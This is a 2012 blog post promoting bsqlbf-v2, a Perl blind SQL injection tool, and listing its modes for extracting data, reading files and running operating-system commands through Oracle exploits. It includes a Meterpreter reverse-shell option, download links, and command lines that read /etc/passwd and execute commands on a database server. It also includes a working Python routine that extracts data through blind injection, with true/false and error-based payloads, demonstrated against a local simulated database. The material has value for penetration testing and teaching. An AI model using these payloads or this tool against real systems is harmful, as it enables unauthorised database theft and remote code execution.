Wednesday, October 10, 2012

bsqlbf-v2 - Blind Sql Injection Brute Forcer version 2


This is a modified version of 'bsqlbfv1.2-th.pl'. The Perl script extracts data through blind SQL injection: it takes a custom SQL query as a command-line parameter and works for both integer-based and string-based injection points. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports nine attack modes (types 0 to 8), selected with the -type switch:

Type 0: blind SQL injection based on true and false conditions returned by the back-end server.
Type 1: blind SQL injection based on true and error (e.g. syntax error) responses returned by the back-end server.
Type 2: blind SQL injection in "order by" and "group by" clauses.
Type 3: extracting data with SYS privileges (Oracle dbms_export_extension exploit).
Type 4: O.S. code execution (Oracle dbms_export_extension exploit).
Type 5: reading files (Oracle dbms_export_extension exploit, based on Java).
Type 6: O.S. code execution via the DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit.
Type 7: O.S. code execution via SYS.KUPP$PROC.CREATE_MASTER_PROCESS(); requires DBA privileges.
  -cmd=revshell: Type 7 supports Meterpreter payload execution; run generator.exe first.
Type 8: O.S. code execution via DBMS_JAVA_TEST.FUNCALL; requires Java IO permissions.
  -cmd=revshell: Type 8 supports Meterpreter payload execution; run generator.exe first.

For Type 4 (O.S. code execution) the following methods are supported, selected with the -stype switch:
SType 0 (default) is based on Java; it will NOT work against Oracle XE.
SType 1 targets Oracle 9 with plsql_native_make_utility.
SType 2 targets Oracle 10 with dbms_scheduler.
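To make the Type 0 and Type 1 modes concrete, here is an added example (written for this page; it is not code from the post or from bsqlbf) that simulates both oracles against an in-memory SQLite database and recovers the result of an arbitrary sub-query character by character, the way the -sql option does. The users table, the injectable page and the target sub-query are constructed for the example; the function names (vulnerable_query, page_is_true, page_errors, extract) are assumptions. Against a real target the two oracle functions would issue an HTTP request and compare the body against the -match string (Type 0) or look for an error page (Type 1); nothing else in the extraction loop changes. Because SQLite only raises an arithmetic error for abs() of the smallest 64-bit integer, the Type 1 payload uses that as its error trigger; MySQL and MS-SQL need a different one.

```python
"""Added example: blind SQL injection extraction, Type 0 and Type 1 style.

Not part of the original post and not bsqlbf's own code. The vulnerable page,
the table contents and the sub-query being stolen are all constructed here.
"""
import sqlite3
from typing import Callable

# Constructed sample back end standing in for the target's database.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users(id INTEGER, name TEXT, pw TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cr3t');
INSERT INTO users VALUES (2, 'guest', 'guest');
""")


def vulnerable_query(param: str) -> list:
    """Hypothetical injectable page: the parameter is concatenated into SQL."""
    sql = "SELECT name FROM users WHERE id = " + param
    return _db.execute(sql).fetchall()


def page_is_true(param: str) -> bool:
    """Type 0 oracle: does the page show the 'true' content (a row came back)?"""
    try:
        return len(vulnerable_query(param)) > 0
    except sqlite3.Error:
        return False


def page_errors(param: str) -> bool:
    """Type 1 oracle: did the query blow up, regardless of what it returned?"""
    try:
        vulnerable_query(param)
        return False
    except sqlite3.Error:
        return True


def type0_payload(cond: str) -> str:
    """Type 0: AND the condition into the WHERE clause; the page reveals it."""
    return f"1 AND ({cond})"


def type1_payload(cond: str) -> str:
    """Type 1: the page looks the same either way, so make the TRUE branch raise.

    abs() of the smallest 64-bit integer is the one arithmetic error SQLite
    raises (MySQL/MSSQL need a different error trigger); the id*0 term keeps
    SQLite from pre-evaluating the expression before the condition is checked.
    """
    return (f"1 AND (CASE WHEN ({cond}) "
            "THEN abs(id*0-9223372036854775807-1) ELSE 1 END)")


def extract(subquery: str, oracle: Callable[[str], bool],
            payload: Callable[[str], str], max_len: int = 32) -> str:
    """Recover the first row of `subquery` one character at a time.

    Each character is located by a binary search over its code point, which
    costs 7 oracle calls instead of the ~95 a linear scan over printable ASCII
    would take. Only the single-bit answer of `oracle` is ever observed.
    max_len mirrors the tool's -length default of 32.
    """
    result = ""
    for pos in range(1, max_len + 1):
        # SQLite spelling; on MySQL/MSSQL this would be ascii(substring(...)).
        char = f"unicode(substr(({subquery}),{pos},1))"
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(payload(f"{char} > {mid}")):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() gives '' and unicode('') is NULL
            break
        result += chr(lo)
    return result


class Counted:
    """Wrap an oracle so the number of requests it cost can be reported."""

    def __init__(self, oracle: Callable[[str], bool]) -> None:
        self.oracle, self.calls = oracle, 0

    def __call__(self, param: str) -> bool:
        self.calls += 1
        return self.oracle(param)


if __name__ == "__main__":
    target = "SELECT pw FROM users WHERE name='admin'"
    for label, oracle, payload in (("Type 0", page_is_true, type0_payload),
                                   ("Type 1", page_errors, type1_payload)):
        counted = Counted(oracle)
        print(f"{label}: {extract(target, counted, payload)!r} "
              f"in {counted.calls} requests")
```

Both modes recover the same string; the only difference is which side channel the oracle reads. The request count is what -length and -start are for: every position costs seven requests, including the one that detects the end of the string, so a known prefix or a tight length bound saves real traffic against a slow or rate-limited target.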
Download -
bsqlbf-v2-7.pl

Download other versions from here -
http://code.google.com/p/bsqlbf-v2/downloads/list



Usage examples:
$ ./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
(Type 0, the default, against MS-SQL over POST: extracts the first user table name from sysobjects, using the string "true" to recognise a true response.)
$ ./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"
(Type 4 against Oracle: runs the given command on the database server through the dbms_export_extension exploit.)

User interface (help output of version 2.3, which only knows types 0 to 5):
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl

// Blind SQL injection brute forcer \\
// originally written by...aramosf@514.es \\
// modified by sid-at-notsosecure.com \\
// http://www.notsosecure.com \\
---------------------usage:-------------------------------------------
Integer based Injection--> ./bsqlbf-v2-3.pl -url http://www.host.com/path/script.php?foo=1000 (options)
String Based Injection--> ./bsqlbf-v2-3.pl -url http://www.host.com/path/script.php?foo=bar' (options)
------------------------------------options:--------------------------
-sql: valid SQL syntax to get; version(), database(), (select table_name from information_schema.tables limit 1 offset 0)
-get: If MySQL user is root, supply world readable file name
-blind: parameter to inject sql. Default is last value of url
-match: *RECOMMENDED* string to match in valid query, Default is auto
-start: if you know the beginning of the string, use it.
-length: maximum length of value. Default is 32.
-time: timer options:
    0: dont wait. Default option.
    1: wait 15 seconds
    2: wait 5 minutes
-type: Type of injection:
    0: Type 0 (default) is blind injection based on True and False responses
    1: Type 1 is blind injection based on True and Error responses
    2: Type 2 is injection in order by and group by
    3: Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
    4: Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)
    5: Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)
-file: File to read (default C:\boot.ini)
-stype: How you want to execute command:
    0: SType 0 (default) is based on java..will NOT work against XE
    1: SType 1 is against oracle 9 with plsql_native_make_utility
    2: SType 2 is against oracle 10 with dbms_scheduler
-database: Backend database:
    0: MS-SQL (Default)
    1: MYSQL
    2: POSTGRES
    3: ORACLE
-rtime: wait random seconds, for example: "10-20".
-method: http method to use; get or post. Default is GET.
-cmd: command to execute(type 4 only). Default is "ping 127.0.0.1."
-uagent: http UserAgent header to use. Default is bsqlbf 2.3
-ruagent: file with random http UserAgent header to use.
-cookie: http cookie header to use
-rproxy: use random http proxy from file list.
-proxy: use proxy http. Syntax -proxy=http://proxy:port/
-proxy_user: proxy http user
-proxy_pass: proxy http password
---------------------------- examples:-------------------------------
bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from information_schema.tables limit 1 offset 0" -database 1 -type 1
bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

1 comment:

  1. Thanks - very nice script! Another helpful article on blind sql injection:

    http://www.programmerinterview.com/index.php/database-sql/blind-sql-injection/